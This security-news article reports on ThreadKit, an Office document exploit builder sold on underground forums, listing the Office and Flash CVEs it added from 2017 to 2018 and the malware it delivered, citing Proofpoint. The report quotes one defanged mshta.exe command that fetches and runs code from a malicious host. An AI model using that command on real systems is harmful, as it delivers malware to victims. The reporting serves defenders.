Thursday, March 28, 2024

Hackers Distributing Variety of New Exploits and Malware via Microsoft Office Document Exploit Kit

Newly discovered Microsoft office document exploit kit contains a variety of recent exploits and Malware such as Lokibot, Formbook and tracking kit called such as ThreadKit targeting various organization and individuals around the world.

These Exploits kits are available in restricted underground crime forums and the cybercriminals are selling them at a different price.

They are used to spread a variety of malware payloads such as Trickbot and Chthonic, and RATs such as FormBook and Loki Bot and it also used for more sophisticated cyber attacks.

Also Read: Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market

Exploit Kit Activities in June 2017

Initially, ThreadKit starts its activities around mid of 2017 with many of powerful exploits such as EXE and DOC files inside of the VBS Script.

It contains an exploited CVE-2017-0199 and download and execute the payload from its command and control server and install the embedded Smoke Loader and Trick banking malware.

Downloaded Decoy document

Exploit Kit Activities in October 2017

During October 2017, ThreadKit Started advertising in the underground forum including with another Exploit CVE 2017-8759.

Later it communicates with C2 server to execute the embedded executable and additionally it integrating the new vulnerabilities.

Also, it using various technique to avoid detection and employee the advance method to avoid detection by modifying the registry key.

The registry value “z|#” contains the path to the parent malicious document

Exploit kit Activities November 2017

Since Nov 2017 ThreadKit starts its aggressive activities and employee with brand new Microsoft Office vulnerabilities.

It Advertised the inclusion of exploits targeting CVE 2017-11882 running un the following command: “mshta.exe hxxps://seliodrones[.]info/vmware/w&\x12\x0cC”

Exploit kit Activity in February/March 2018

Very recent activities of this Exploit kit in Feb/March contains a very new serious exploit such as Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft Office vulnerabilities.

According to Proofpoint,  A new forum post in February 2018 announced that exploits for the recently disclosed CVE-2018-0802, as well as a July 2017 Office vulnerability (CVE-2017-8570), had been added to ThreadKit.

Main Distributing of the large spike of email campaigns with ThreadKit generated MS Office attachments that included these exploits.

“ThreadKit is a relatively new and popular document exploit builder kit that has been used in the wild since at least June 2017, by a variety of actors carrying out both targeted and broad-based crimeware campaigns. This new document exploit builder kit makes the use of the latest Microsoft Office exploits accessible to even low-skilled malicious actors. Proofpoint said.”

Website

Latest articles

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...

Hackers Actively Exploiting Ray AI Framework Flaw to Hack Thousands of Servers

A critical vulnerability in Ray, an open-source AI framework that is widely utilized across...

Chinese Hackers Attacking Southeast Asian Nations With Malware Packages

Cybersecurity researchers at Unit 42 have uncovered a sophisticated cyberespionage campaign orchestrated by two...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles